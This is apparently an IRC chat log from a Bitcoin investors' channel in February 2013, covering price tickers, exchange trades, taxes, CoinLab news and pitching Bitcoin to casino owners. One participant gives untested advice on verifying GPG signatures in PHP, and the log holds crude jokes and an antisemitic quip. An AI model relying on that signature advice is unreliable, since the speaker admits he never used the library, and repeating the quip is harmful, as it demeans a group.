03:08:14 I am poor, FSVO poor. Feb 27 03:08:20 a system only works when used properly Feb 27 03:08:34 So if I can keep a lil' more to myself... :) Feb 27 03:08:39 but i do believe the sentiment of those bitcoiners Feb 27 03:08:52 woulod be to sneak around with the btc money Feb 27 03:09:10 ya, because most bitcoiners have bupkiss understanding of pricing risk Feb 27 03:09:20 Yes, we do need legitimate business on a more serious voice. Feb 27 03:09:22 so they end up "investing" in whatever, btcjam and miner bonds Feb 27 03:10:25 ;;ticker Feb 27 03:10:25 BTCUSD ticker | Best bid: 31.02001, Best ask: 31.20000, Bid-ask spread: 0.17999, Last trade: 31.20000, 24 hour volume: 42934.16522334, 24 hour low: 30.11710, 24 hour high: 31.69900, 24 hour vwap: 31.03445 Feb 27 03:10:55 okay, so about the system and taxes, doesnt spending bitcoin on bitcoin offerings still break things Feb 27 03:11:17 like if evoorhees rakes in btc Feb 27 03:11:22 and spends it as btc Feb 27 03:11:35 he never pays a tax Feb 27 03:11:57 Possibly. For instance buying/selling securities may be subject to different tax rules. Feb 27 03:11:57 why would he ? Feb 27 03:12:01 loads of money goes in Feb 27 03:12:04 but doesnt come out Feb 27 03:12:10 so ? Feb 27 03:12:11 well Feb 27 03:12:19 i guess it still comes out somewhere Feb 27 03:12:28 at least these days Feb 27 03:12:40 whatever thing you buy was probably paid to make with fiat Feb 27 03:12:45 For example, here they tax *every* profitable transaction by 16%. Not at the end of the year, or the month, but as soon as it happens. Feb 27 03:12:52 but still a lot less tax being collected Feb 27 03:12:54 where's "here" ? Feb 27 03:13:22 mircea_popescu: BVB, the stock market Feb 27 03:13:38 It's pretty messed up. Feb 27 03:13:38 i do wish US taxes were simpler and closer to a flat tax Feb 27 03:13:43 i have no idea, haven't followed that since the late 90s Feb 27 03:14:11 but that notwithstanding, btc and btc stocks have nothing to do with fiat rules and fiat definitions. Feb 27 03:14:12 so what does a government do to get the tax they need? Feb 27 03:14:16 adopt btc? Feb 27 03:14:22 ThickAsThieves that'd be their problem. Feb 27 03:14:30 Let's just say I might break even on gold after losing quite a bit of money on the stock market. Feb 27 03:14:45 Not particularly hit by the crisis, but my trades weren't exactly great. Feb 27 03:15:12 Eduard_Munteanu if that thing ain't rigged i'm a girl and don't even know about it.\ Feb 27 03:15:51 Perhaps, besides BVB is sort of a joke market compared to other similar stuff. Feb 27 03:16:09 right. i don't understand why anyone'd bother, other than to hedge speciffic risks Feb 27 03:16:19 get a grown-up acct in ny or w/e Feb 27 03:16:20 I'd much rather do forex. Haven't tried Sibex though. Feb 27 03:16:36 this is like getting .ro domains srsly. Feb 27 03:16:45 nobody sane would be involved. Feb 27 03:16:52 Heh, yeah. Feb 27 03:17:07 you wanna trade forex, get an account on the actual market Feb 27 03:17:45 mircea_popescu: I went through some random trader from US, the only thing I complain is the huge leverage Feb 27 03:17:52 why trade bizarre illiquid shit... i mean, mpex and bvb are not exactly the same size, but not exactly that far off. Feb 27 03:17:56 forex.com IITC Feb 27 03:18:06 *IIRC Feb 27 03:18:32 is forex.com legit ? Feb 27 03:18:41 Yes, I could literally influence the market on BVB, even on certain Cat I securities. Feb 27 03:19:30 anyway, never heard of em. use schwab or edward jones or w/e Feb 27 03:19:33 something that exists Feb 27 03:19:49 mircea_popescu: yes, it worked fine for me Feb 27 03:20:11 I didn't put a lot of money in it, a few hundred dollars. Feb 27 03:21:00 a well Feb 27 03:21:07 Stuff like USD/gold or USD/CHF is nice, but the leverage is a bit too high IMO. E.g. if you're betting on US inflating their money supply. Feb 27 03:21:37 you don't HAVE to use leverage you don't want now do you Feb 27 03:21:52 Yeah, you can trade less. Feb 27 03:22:16 exactly. Feb 27 03:22:56 Actually yeah, dunno why I said that. :) Feb 27 03:23:26 lol k Feb 27 03:23:30 I actually did something like that at some point. Though I'd lose patience and go with more bucks at it, perhaps that was it. :D Feb 27 03:23:42 ya well discipline matters. Feb 27 03:24:06 Luckily it's all stop-loss and you can't end up in debt, AFAIR. Feb 27 03:24:39 I suspect you might need something like that to short safely on BTCs. Feb 27 03:25:23 sup atlas Feb 27 03:25:33 bithub = atlas ?! Feb 27 03:25:47 surely Eduard_Munteanu is Feb 27 03:26:06 o ya think ? Feb 27 03:26:22 cheers for the divs mircea :) Feb 27 03:26:28 Eduard_Munteanu zi bre, care-i diferenta intre o pisica alba si-una neagra ? Feb 27 03:28:11 dub maybe so. Feb 27 03:28:17 BitHub hehe enjoy. Feb 27 03:45:07 ;;ticker Feb 27 03:45:07 BTCUSD ticker | Best bid: 31.06093, Best ask: 31.20001, Bid-ask spread: 0.13908, Last trade: 31.20001, 24 hour volume: 42934.80821886, 24 hour low: 30.11710, 24 hour high: 31.69900, 24 hour vwap: 31.04091 Feb 27 03:45:15 crash Feb 27 03:45:27 Yeah a fall to 31.2 is a crash lol Feb 27 03:45:58 it as 31.6 earlier lol Feb 27 03:46:03 mircea_popescu: heh, no, I don't think I know that one Feb 27 03:46:15 dub: hm? Feb 27 03:47:51 [HAVELOCK] [KCIM] 1 @ 1 BTC [+] Feb 27 03:49:59 so no high yet, hmmm Feb 27 03:50:05 bulls wake up! Feb 27 03:50:17 nope crash time Feb 27 03:50:46 yeah it cvould crash all the way to $31 Feb 27 03:50:48 watch out Feb 27 03:50:54 anything over $20 would just be a correction anyway:) Feb 27 03:53:16 [MPEX] [S.DICE] 665 @ 0.00634999 = 4.2227 BTC [-] Feb 27 03:57:14 [BTCTC] [BTC-BOND] 1 @ 0.01 BTC [+] Feb 27 04:00:21 Hey guys, you can now talk to BitHub directly from our site, I know wow real time customer service, who knew. Feb 27 04:01:32 what is your site? Feb 27 04:13:07 bithub.com? Feb 27 04:14:05 bithub.com.au Feb 27 04:15:30 your icon is broken Feb 27 04:15:55 also weird name: https://bitcointalk.org/index.php?topic=29588.0 Feb 27 04:16:38 lol @ last 2 posts there Feb 27 04:17:24 heheh, telling this whole room of people about bitcoin... Feb 27 04:17:34 has caused quite the discussion on currency and dollars. Feb 27 04:18:27 i'll tell you guys more later. but this is pretty cool conversation over here. people are really receptive to btc -- and these people totally non-technical. Feb 27 04:19:22 http://polimedia.us/dtng/c/src/136192804573.jpg random person upon hearing "Bitcoin" Feb 27 04:19:24 tru story. Feb 27 04:19:29 mod6 ?? Feb 27 04:19:45 indian malarkey? Feb 27 04:19:56 kakobrekla: these are the guys who are involved with the legalized casino gaming in minnesota. Feb 27 04:20:13 aha Feb 27 04:20:16 haha, nice mircea_popescu Feb 27 04:20:31 totally. Feb 27 04:21:01 i passed around .1 BTC on a paper wallet, that was the basic reaction ;) Feb 27 04:21:30 is that pic i want to get fucked by or for btc? Feb 27 04:21:36 you know, i should probably do a buncha Bank of MPEx paper btc notes Feb 27 04:21:51 kakobrekla it's "stfu and take my maidenhood" Feb 27 04:21:55 sorta like money but for girls ? Feb 27 04:21:56 that'd be sweet! Feb 27 04:22:08 hm, any designers in da house ? Feb 27 04:22:21 brb, these guys are having a full argument about cash and what the fed does and how in debt/fucked we are... Feb 27 04:22:32 mod6 who? Feb 27 04:22:43 some homies Feb 27 04:22:51 i know how to turn on photoshop Feb 27 04:23:00 or do you mean who's fucked aethero? Feb 27 04:23:01 its double click on that blue PS Feb 27 04:23:06 Who's fucked Feb 27 04:23:07 if you mean who, i mean the world Feb 27 04:23:22 or more directly, the us. Feb 27 04:23:33 The who? Feb 27 04:23:38 so we're talkin about what's really taking place. Feb 27 04:23:40 You? Feb 27 04:23:44 wat Feb 27 04:23:47 dude. Feb 27 04:23:49 "the us" Feb 27 04:23:54 who's "us"? Feb 27 04:23:57 The United States of Amerika Feb 27 04:24:11 I dont know Amerika Feb 27 04:24:37 I know America. And U.S. ;) Feb 27 04:24:37 its mostly jesus and meth. Feb 27 04:24:38 a bank that doesn't lend money eh popescu? Feb 27 04:24:42 lol stop trollin me Feb 27 04:24:48 i gotta get back to it. Feb 27 04:24:52 bbl Feb 27 04:25:17 mircea_popescu: lends me 1 million BTC Feb 27 04:25:43 lul stringpuller Feb 27 04:25:44 funny link Feb 27 04:27:28 so, fellas, think we go down from there for a while? or rally this week? Feb 27 04:28:20 http://bitcoincharts.com/charts/mtgoxUSD#tgSzm1g10zm2g25zi1gMACDzi2gStochRSIzi3gCOscillatorzi4gCOscillatorzv Feb 27 04:28:38 macd looks off Feb 27 04:28:51 to my untrained eyes Feb 27 04:29:16 but instincts curious what anyone else sees Feb 27 04:29:42 http://bitcoincharts.com/charts/mtgoxUSD#tgSzm1g10zm2g25zi1gMACDzi2gStochRSIzi3gCOscillatorzi4gRSIzv Feb 27 04:30:03 does it even mean anything? Feb 27 04:31:32 I doubt it Feb 27 04:32:15 reason or feeling? Feb 27 04:32:52 instinct is a bastard mutant of those two. Feb 27 04:32:58 and is an acceptable answer Feb 27 04:33:23 ;;slap deadweasel Feb 27 04:33:34 that was heavier than expected Feb 27 04:39:04 yeah Feb 27 04:39:21 stop with the useless slaps Feb 27 04:39:22 ;;ticker Feb 27 04:39:22 BTCUSD ticker | Best bid: 31.10002, Best ask: 31.18000, Bid-ask spread: 0.07998, Last trade: 31.18000, 24 hour volume: 43378.82060481, 24 hour low: 30.11710, 24 hour high: 31.69900, 24 hour vwap: 31.05179 Feb 27 04:39:29 too much noise Feb 27 04:40:28 you can pm gribble and slap yourself there if you really wanna Feb 27 04:42:39 [BTCTC] [PAJKA.BOND] 1 @ 0.1 BTC [+] Feb 27 04:43:35 my bad Feb 27 04:43:43 sorry Feb 27 04:44:33 alot of these guys in here are very wealthy, and haha, bitcoin and this discussion is scaring the shit out of them Feb 27 04:44:41 talk about all-time complacentcy Feb 27 04:45:09 more in a bit... Feb 27 04:48:34 http://webcache.googleusercontent.com/search?q=cache:_oY05tYId38J:blog.glbse.com/no-electronic-devices+&cd=1&hl=en&ct=clnk&gl=nz&client=firefox-a Feb 27 04:48:54 I know its a bit late for this but.. what a fucking idiot Feb 27 04:54:22 yup Feb 27 04:54:36 prolly the last ppl you want to mention btc to Feb 27 04:55:38 [MPEX] [O.BTCUSD.C330T] 10 @ 0.14012133 = 1.4012 BTC [-] Feb 27 05:05:29 [MPEX] [S.BBET] 298 @ 0.00196499 = 0.5856 BTC [-] Feb 27 05:06:49 [MPEX] [S.DICE] 92 @ 0.00634999 = 0.5842 BTC [-] Feb 27 05:08:10 [MPEX] [S.MPOE] 770 @ 0.00075894 = 0.5844 BTC [+] Feb 27 05:08:58 [MPEX] [S.DICE] 220 @ 0.00634999 = 1.397 BTC [-] Feb 27 05:17:00 ;;ticker Feb 27 05:17:02 BTCUSD ticker | Best bid: 31.11011, Best ask: 31.19999, Bid-ask spread: 0.08988, Last trade: 31.19999, 24 hour volume: 42530.67594311, 24 hour low: 30.11710, 24 hour high: 31.69900, 24 hour vwap: 31.07588 Feb 27 05:22:51 [HAVELOCK] [SDICE] 12 @ 0.6749 = 8.0988 BTC [-] Feb 27 05:23:58 [HAVELOCK] [SDICE] 13 @ 0.6749 = 8.7737 BTC [-] Feb 27 05:24:07 what is this meme about some old people going crazy about an idea Feb 27 05:24:23 the old people i assume are businessmen Feb 27 05:26:34 http://knowyourmeme.com/photos/408229 Feb 27 05:26:39 idk what its called Feb 27 05:46:44 guys, BFL wafers are real! Feb 27 05:46:45 http://img.tradeindia.com/fp/0/237/332.jpg Feb 27 05:47:41 needs moar clock buffer Feb 27 06:02:25 http://www.zerohedge.com/news/2013-02-26/alternative-currency-goes-mainstream-bitcoin-atms-emerge Feb 27 06:03:43 person actually thinks the 50 bux wordpress charged for a domain reg is why btc doubled. Feb 27 06:05:23 "BitCoin, brought to you by the same power elite who own the money printing industry. Feb 27 06:05:23 Can you PHYSICALLY HOLD BITCOINS IN YOUR HAND?" Feb 27 06:05:28 pretty great collection of idiots. Feb 27 06:13:17 [MPEX] [S.MPOE] 7985 @ 0.00074743 = 5.9682 BTC [-] Feb 27 06:13:19 [MPEX] [S.MPOE] 5000 @ 0.00074742 = 3.7371 BTC [-] Feb 27 06:13:21 [MPEX] [S.MPOE] 4101 @ 0.00074741 = 3.0651 BTC [-] Feb 27 06:27:12 ok Feb 27 06:27:18 so i bought btc with ripples Feb 27 06:27:20 on the market Feb 27 06:27:21 sent to stamp Feb 27 06:27:26 all the money is gone! Feb 27 06:27:29 lol Feb 27 06:27:55 ah Feb 27 06:27:58 now its here Feb 27 06:27:59 damn Feb 27 06:28:09 it accually works Feb 27 06:34:03 well got about 0.6 out of that Feb 27 06:34:25 so meh Feb 27 06:34:27 but it works. Feb 27 06:43:36 Ripple? I don't understand how it works, not really any instructions Feb 27 06:44:01 dunno its fucked Feb 27 06:44:10 i just clicked a lot of buttons Feb 27 06:44:16 did a few hax Feb 27 06:44:25 and btc poped out Feb 27 06:45:11 its not that i dont belive that the price of that shit will go up, just not as much as btc. Feb 27 07:01:13 i just like saying ripple Feb 27 07:01:19 it creates buzz Feb 27 07:11:20 http://asportinginterest.blogspot.ca/2013/02/bitcoin-liquidity-revisited-save.html Feb 27 07:11:23 good read Feb 27 07:15:58 "Recently I wrote about how the viability of bitcoin was limited by the risk of total, sudden liquidity collapse . The argument can be summarized as saying that without institutions whose business is transacted in it, bitcoin suffers from a bootstrapping problem whereby a crack in the crypto scheme would create an instant wave of counterfeit and debasement. Since there is no entity to restore trust in the currency with Feb 27 07:15:58 a guarantee, e.g. no central bank or government to offer a sovereign guarantee, a crack would make bitcoin illiquid and worthless. " Feb 27 07:16:03 that is the stupidest thing i read today Feb 27 07:16:09 for srsly now. Feb 27 07:16:24 first off, a crack would make bitcoin useless to begin with. Feb 27 07:16:29 second off, it's not illiquid. Feb 27 07:16:32 third off, what ?! Feb 27 07:17:04 this person does not belong writing. Feb 27 07:17:23 and the presence of a bitcoin casino doesn't make an abandoned/cracked bitcoin system viable again Feb 27 07:17:31 right. Feb 27 07:17:47 moreover, if god himself guaranteed a cracked currency Feb 27 07:17:51 it'd still be worthless Feb 27 07:17:58 [MPEX] [S.MPOE] 12543 @ 0.00074124 = 9.2974 BTC [-] Feb 27 07:20:09 ;;seen evoorhees Feb 27 07:20:09 evoorhees was last seen in #bitcoin-assets 2 weeks, 0 days, 6 hours, 46 minutes, and 14 seconds ago: perfect Feb 27 07:28:03 you didn't like my link mircea_popescu Feb 27 07:28:10 dude i bring quality material Feb 27 07:32:42 (18:54) < kakobrekla> prolly the last ppl you want to mention btc to Feb 27 07:33:31 maybe so. but after talking to 'em and answering questions for 2 hours they're getting it. Feb 27 07:33:52 they love what MPEx is, and we talked about bitbet for a while and how that works... Feb 27 07:34:01 this is turning out pretty well. Feb 27 07:34:12 i was talking about dubs link Feb 27 07:34:17 nefario talking to us customs Feb 27 07:34:23 not about you mod6 Feb 27 07:35:23 oh sorry. Feb 27 07:37:16 im setting up another bitcoin server and I can't find the default bitcoin.conf on debian squeeze Feb 27 07:37:37 not the user dir but the default location when it installs Feb 27 07:37:44 anyone know where it is? Feb 27 07:37:49 its not ~/.bitcoin ? Feb 27 07:38:06 i think so too Feb 27 07:38:07 nope not in ~ Feb 27 07:38:15 hmm Feb 27 07:38:30 just do like `find / -name "bitcoin.conf"` Feb 27 07:38:37 im looking for the default file not the user file Feb 27 07:40:21 thats odd Feb 27 07:40:37 it's only finding this /usr/share/doc/bitcoind/examples/bitcoin.conf Feb 27 07:40:51 it can't be using that right now Feb 27 07:41:02 hmmm Feb 27 07:50:20 wow. "[23:19] this person does not belong writing." Feb 27 07:50:30 never seen you get so annoyed that your english gets broken :P Feb 27 07:51:05 'does not belong writing' is something I expect to read in a chinese manual. :P Feb 27 07:54:52 Hey Ukto. Left you PMs Feb 27 08:20:22 Ukto: he accidently a word Feb 27 08:27:22 Ukto actually it's fine Feb 27 08:28:16 jcpham in general you do but that one was for the birds Feb 27 08:28:32 mod6 is the new bitcoin jesus Feb 27 09:14:11 wh1t3r4bb1t: there is no default bitcoin.conf Feb 27 09:18:09 if you create bintcoin.conf in the datadir it will use that by default Feb 27 09:18:21 bitcoin.conf too Feb 27 09:21:28 what is this ? nefario talking to us customs Feb 27 09:21:46 when he tried to get into usa with no money from china? Feb 27 09:23:31 yeah Feb 27 09:23:51 thought it might have been recent, thanks Feb 27 09:27:51 ;; ticker Feb 27 09:27:52 BTCUSD ticker | Best bid: 31.02002, Best ask: 31.18998, Bid-ask spread: 0.16996, Last trade: 31.18998, 24 hour volume: 40177.44122778, 24 hour low: 30.22822, 24 hour high: 31.69900, 24 hour vwap: 31.17512 Feb 27 09:28:23 Guess this is the normal lul before the usual Thursday fireworks Feb 27 09:33:17 [BTCTC] [B.YABMC] 1 @ 0.00896 BTC [-] Feb 27 09:40:52 Who wants to fill the rest of my BTC-BOND borrowing capacity? Feb 27 09:41:26 are you asking if we want to borrow btc? Feb 27 09:42:04 No, I'm borrowing **** BEGIN LOGGING AT Wed Feb 27 15:34:53 2013 Feb 27 15:35:10 ;;ticker Feb 27 15:35:11 BTCUSD ticker | Best bid: 31.08945, Best ask: 31.12948, Bid-ask spread: 0.04003, Last trade: 31.08945, 24 hour volume: 33052.15782040, 24 hour low: 30.79010, 24 hour high: 31.69900, 24 hour vwap: 31.15151 Feb 27 15:35:26 what, we crashed again ? Feb 27 15:37:38 crashed? Feb 27 15:37:56 i thought your english over all was pretty good Feb 27 15:40:14 bitcoinuser@tyler /usr/bin$ bitcoind getbalance 1361970921224185 Feb 27 15:40:14 17349.26400326 Feb 27 15:41:39 Chaang-Noi don't get cheeky. Feb 27 15:54:52 US unemployment merits third round of money printing, says Ben Bernanke Feb 27 15:56:16 http://bitcoinmagazine.com/coinlab-bringing-bitcoin-to-wall-street-with-mtgox-deal lol i read first sentence and closed the tab Feb 27 15:56:37 this rarely heppens, i'm fairly bullshit-tolerant Feb 27 15:56:56 i thought i was very tolerant Feb 27 15:57:01 i had a reputation for such tolerance Feb 27 15:57:05 then bitcoin Feb 27 15:58:36 i read the url and didnt open it Feb 27 16:00:01 plus, it's linked from reddit complete with GLBSE logo Feb 27 16:00:17 lol reddit Feb 27 16:00:40 i guess its still better than the comments section for that zerohedge piece i linked yest Feb 27 16:04:20 Subject: Transaction is completed Feb 27 16:04:20 X-PHP-Script: vbwojvaixfhhwpfvgbxgjgc.uncw.edu/sendmail.php for 194.78.197.113 Feb 27 16:04:20 From: "Payment notification system" Feb 27 16:04:31 uncw should get no grants in 2013 Feb 27 16:06:12 [BTCTC] [S.MPOE-PT] 25 @ 0.00071 = 0.0178 BTC [+] Feb 27 16:06:15 [BTCTC] [S.MPOE-PT] 9975 @ 0.0007 = 6.9825 BTC [-] Feb 27 16:11:58 where is that email form Feb 27 16:12:04 from Feb 27 16:12:12 some spammer Feb 27 16:27:13 [MPEX] [S.DICE] 1000 @ 0.00636999 = 6.37 BTC [+] Feb 27 16:27:15 [MPEX] [S.DICE] 4000 @ 0.00637 = 25.48 BTC [+] Feb 27 16:27:56 [HAVELOCK] [SDICE] 30 @ 0.66 = 19.8 BTC [-] Feb 27 16:27:57 [HAVELOCK] [SDICE] 5 @ 0.65 = 3.25 BTC [-] Feb 27 16:27:59 [HAVELOCK] [SDICE] 15 @ 0.65 = 9.75 BTC [-] Feb 27 16:29:28 mircea_popescu: any idea what "validity" values are, in reference to a gpg signature verification? when i use php's gnupg_verify() i get either validity=4 (for valid signature) or validity=0 (for invalid signature) Feb 27 16:29:55 i can't just assume that anything >0 is valid.... i need to be sure i know what it means Feb 27 16:30:38 mmm Feb 27 16:30:58 iirc the way to use that function is set checksig to false and then see if it returns the fingerprint Feb 27 16:32:08 it returns an array: {"fingerprint":"8DDE8C2B4DE2278A95C3D65B9214FC6BF1B69921","validity":4,"timestamp":1361385050,"status":0,"summary":3} Feb 27 16:32:32 or if invalid: {"fingerprint":"9214FC6BF1B69921","validity":0,"timestamp":0,"status":117440520,"summary":4} Feb 27 16:32:52 so fingerprint is always returned, but its the key id instead of the fingerprint if the signature is invalid Feb 27 16:37:21 [MPEX] [S.DICE] 2000 @ 0.00637989 = 12.7598 BTC [+] Feb 27 16:37:23 [MPEX] [S.DICE] 3000 @ 0.0063799 = 19.1397 BTC [+] Feb 27 16:37:38 looks like you'll have too use the sauce Feb 27 16:38:08 where do the calues come from Feb 27 16:38:12 *values Feb 27 16:39:04 topace so then fingerprint is NOT always returned Feb 27 16:39:15 as in keyid != fingerprint Feb 27 16:39:19 jurov: they come from the array that gnupg_verify() returns Feb 27 16:40:13 mircea_popescu: right, so, if strlen(fingerprint)>15 then its a valid signature? sounds sloppy Feb 27 16:40:21 not at all Feb 27 16:40:35 if returned_fingerprint == expected fingerprint then valid Feb 27 16:43:23 okay and you're 100% positive that is enough to confirm a signature validity? Feb 27 16:44:55 [HAVELOCK] [SDICE] 1 @ 0.65 BTC [-] Feb 27 16:44:57 [HAVELOCK] [SDICE] 8 @ 0.643 = 5.144 BTC [-] Feb 27 16:44:58 [HAVELOCK] [SDICE] 20 @ 0.6420001 = 12.84 BTC [-] Feb 27 16:44:59 [HAVELOCK] [SDICE] 13 @ 0.642 = 8.346 BTC [-] Feb 27 16:45:01 [HAVELOCK] [SDICE] 3 @ 0.641 = 1.923 BTC [-] Feb 27 16:45:02 [HAVELOCK] [SDICE] 4 @ 0.633 = 2.532 BTC [-] Feb 27 16:45:03 [HAVELOCK] [SDICE] 1 @ 0.632 BTC [-] Feb 27 16:55:15 . Feb 27 17:04:30 topace nope. i've never used the php library Feb 27 17:04:52 and since we're on the topic, i dunno how well it was tested, if you use it you'd prolly be well advised to protect it from buffer overflows etc Feb 27 17:05:00 (limit the size message that goes in for instance) Feb 27 17:05:24 hmm k. yea, im already doing some basic sanity checks before the call Feb 27 17:05:24 i'd guess whoever implemented it did it more for show than for banking. Feb 27 17:09:36 mpoe weekly Feb 27 17:09:36 http://shrani.si/f/3f/wy/e602XO/mpoe.jpg Feb 27 17:11:21 http://shrani.si/f/2Y/Wf/3qSHcn8W/bitbet.jpg Feb 27 17:11:23 bitbet daily Feb 27 17:11:29 bullish ;>> Feb 27 17:13:00 [MPEX] [O.BTCUSD.C330T] 2 @ 0.13944319 = 0.2789 BTC [-] Feb 27 17:13:59 ponzi! Feb 27 17:14:26 x diff gap narrowing Feb 27 17:16:27 what they got now, two weeks or so ? Feb 27 17:16:53 22 days Feb 27 17:18:34 3 ya k Feb 27 17:18:58 i think what happens is that 1 month = furthest future point in bitcoin Feb 27 17:19:35 [MPEX] [S.DICE] 50 @ 0.0063799 = 0.319 BTC [+] Feb 27 17:19:38 nobody plans further than hm Feb 27 17:19:40 whoa. Feb 27 17:19:51 do you suppose we can say that since everyone involved lives paycheck to paycheck Feb 27 17:19:57 that's the furthest they can think ahead ? Feb 27 17:20:29 you can't argue that and also argue that the rise is not driven by the reddit/coinbase crowd Feb 27 17:20:29 paycheck, what is dat? Feb 27 17:20:45 ;;asks 32 Feb 27 17:20:47 There are currently 22183.421 bitcoins offered at or under 32.0 USD, worth 705987.683892 USD in total. Feb 27 17:20:59 jezzzus Feb 27 17:21:03 Bugpowder unfortunately. Feb 27 17:21:56 course possibly a workable model would show people buying that know business, people with large stashes that just happened by at the right time Feb 27 17:22:15 after all, any tech liquidity event is geeks selling out to business people. Feb 27 17:23:50 Any thoughts on the coinlab story? It's not clear from the wording that they actually ARE buying / HAVE BOUGHT mtgox's US book or they are just TRYING to buy the book and have achieved absolutely nothing. Feb 27 17:24:03 Bugpowder the later. Feb 27 17:24:46 not only is mtgox not selling, but who is coinbase again ? Feb 27 17:24:52 coinlab Feb 27 17:24:57 Bugpowder they are going to be mtgox's us broker essentially Feb 27 17:25:21 Are they? Or are they just leaking some hype to a reporter with no actual deal Feb 27 17:25:38 Bugpowder my point is more alongthe lines, there's about five or six of other corps doing what they do. Feb 27 17:25:47 they are "pivoting" Feb 27 17:25:48 the fact that unlike the competition they have a burn rate is NOT an advantage. Feb 27 17:26:26 guess they found out that HPC work with integer maffs isn't profitable Feb 27 17:27:47 " The goal is to move customers’ money from overseas to Silicon Valley Bank by March 22nd." Like by starting a new way to deposit and stealing the future international wire action, or actually pulling all the existing deposits from Japan/HK to a US bank. Anyone have an interview transcript? Feb 27 17:28:26 Bugpowder you ever heard of something like this released other than as a joint item ? Feb 27 17:28:36 nope Feb 27 17:28:38 mtgox is silent. nothing happened. Feb 27 17:28:44 "goal" Feb 27 17:28:53 other than remarkably incompetent trade mag and remarkably incompetent coinlab pr person. Feb 27 17:28:59 "has worked for a year to sign an exclusive long term deal" Feb 27 17:29:12 i've been working for twelve years to fuck tea leoni. Feb 27 17:30:23 heh Feb 27 17:30:33 you may have enough bitcoins to make it happen Feb 27 17:30:55 i prefer working at it by now. Feb 27 17:32:55 anyway, the way i read it a deal is not even close. Feb 27 17:33:14 I concur Feb 27 17:33:15 if it were you wouldn't be pissing the op off with statements of the kind Feb 27 17:33:32 prolly what happened is they finally got told to take a hike, and are trying to extrac whatever from it Feb 27 17:34:24 looks like VC-style hype trying to create an illusion of success, hopefully leading to actual success. Feb 27 17:34:29 but on the negative side, if coinbase tech competence is anything like their pr ability, Feb 27 17:34:34 they'll be the next large hack Feb 27 17:35:25 at any rate they're running out of money this year, so... meh. Feb 27 17:40:16 coinbase ~= coinlab Feb 27 17:41:47 does not inspire confidence http://blogs-images.forbes.com/jonmatonis/files/2012/10/coinlab-founders.jpg Feb 27 17:42:29 not young enough ? Feb 27 17:42:39 They look dumb in the face Feb 27 17:42:42 not jewish enough ? Feb 27 17:43:57 too "where's my mai tai" looking Feb 27 17:44:14 anyway, my boeuf bourguignon smells done. back later! Feb 27 17:44:58 ;;estimate Feb 27 17:44:59 Next difficulty estimate | 4406669.35421 based on data since last change | 4323557.47279 based on data for last three days Feb 27 17:45:01 Also this story mentions several possible business plans, none of which are related to the current story http://www.forbes.com/sites/jonmatonis/2012/04/24/coinlab-attracts-500000-in-venture-capital-for-bitcoin-projects/ Feb 27 17:45:26 So that shows they have some money but no focus. They are likely a zero. Feb 27 17:46:05 Never match your hat pattern to your shirt pattern Feb 27 17:47:06 "All your gamers are gold" ?? Feb 27 17:51:26 [BTCTC] [BTC-BOND] 3 @ 0.01 = 0.03 BTC [+] Feb 27 18:02:57 [HAVELOCK] [SDICE] 2 @ 0.684 = 1.368 BTC [+] Feb 27 18:15:28 ;;bc,stats Feb 27 18:15:31 Current Blocks: 223435 | Current Difficulty: 3651011.630693214 | Next Difficulty At Block: 223775 | Next Difficulty In: 340 blocks | Next Difficulty In About: 1 day, 15 hours, 36 minutes, and 41 seconds | Next Difficulty Estimate: 4409373.22265 | Estimated Percent Change: 20.77127 Feb 27 18:15:44 aha now we are getting somewhere Feb 27 18:18:17 Yup Feb 27 18:29:02 i declare today ridiculous idea link day in honor of coinlab Feb 27 18:29:09 http://www.theverge.com/2013/2/26/4031938/new-crowdfunding-platforms-let-you-sell-stock-in-yourself Feb 27 18:58:40 yeah, so that ended up going pretty well lastnight. Feb 27 19:01:18 very lengthy and lively discussion on all things money/econ/bitcoin Feb 27 19:01:40 cool beans Feb 27 19:02:34 so are they all converted? Feb 27 19:03:11 haha. not exactly. but at first the guys who are long paper had some FEAR that they're paper is going to 0. and rightly so.... Feb 27 19:03:44 but after talking about this for like 3 or 4 hours... they started to understand btc a bit more and what its important Feb 27 19:04:40 haha, the discussion was HEATED at first... "WHAT IS IT BACKED BY???!!!11" that kinda thing. Feb 27 19:04:55 there was even talk about the Trillion Dollar Coin for like 20 minutes lol Feb 27 19:05:48 my whole thing is, "if you think that platnium is $1tn because they need it to hypothicate some new money, what does that say about the price of gold, silver or bitcoin?" Feb 27 19:05:57 *STARE INTO SPACE* Feb 27 19:06:09 then they start to see.... Feb 27 19:06:33 one dude outright called me "Crazy" and "a crackhead" lol Feb 27 19:07:20 Jay Walker, a forex prop trader, said he’d jump to any forex broker deal that would allow him to do currency pair trades and get paid out in bitcoins. This is something the Bitcoin exchanges could do by signing deals with forex broker deals – assuming they get through each country’s regulatory process. Feb 27 19:07:25 lulz Feb 27 19:08:05 get him on bit4x kakobrekla Feb 27 19:09:43 one of the dudes over there has been blowing me up for a few weeks about these avalons.. he wants to buy a few to start to do some mining.. and that turned into a lengthy discussion. Feb 27 19:09:55 but he said he's gonna contact them etc to see what he can find out lol Feb 27 19:12:09 i explained the BFL and avalon stuff to them. I think they're pretty sweet on mining. But the online-poker site is something they'd like to see get built. they own a full legal casino here, so I'm trying to get them to see how this would be awesome for gaming, mainly. Feb 27 19:15:13 I think they'd be better off funding some iPad-bitcoin-slotmachines Feb 27 19:16:23 right now when you go into the casino, you can put cash onto your players card -- and when you walk up to a machine you just put your card in. Feb 27 19:17:40 they're getting less and less business from what I understand,.. the money is drying up quite a bit so gaming has been light Feb 27 19:18:18 im sure if they could get something like that going so that people could play their slots from their couch as opposed to driving 40 miles to the casino they'd be happy. Feb 27 19:23:02 [MPEX] [S.DICE] 830 @ 0.0063799 = 5.2953 BTC [+] Feb 27 19:24:15 ;;ticker Feb 27 19:24:16 BTCUSD ticker | Best bid: 31.29001, Best ask: 31.38899, Bid-ask spread: 0.09898, Last trade: 31.38751, 24 hour volume: 29714.39995236, 24 hour low: 30.79010, 24 hour high: 31.39000, 24 hour vwap: 31.12173 Feb 27 19:24:33 more money is about to go into the economy heh Feb 27 19:25:29 I brought 3 .1 BTC paper wallets with me to pass around, so that gave them something to hold and concider while the discussion was going on... after I left I wanted to kick myself. Feb 27 19:25:43 I should have just started a live auction for 'em. Maybe next time. Feb 27 19:26:56 This is a good thing though, because if these guys get wholly onboard, bye-bye fake-economy job, hello bitcoin land! Feb 27 19:28:48 ;;ticker Feb 27 19:28:48 BTCUSD ticker | Best bid: 31.30000, Best ask: 31.38999, Bid-ask spread: 0.08999, Last trade: 31.38999, 24 hour volume: 28119.55661008, 24 hour low: 30.79010, 24 hour high: 31.40000, 24 hour vwap: 31.12346 Feb 27 19:29:12 ;;slap chaang-noi Feb 27 19:29:31 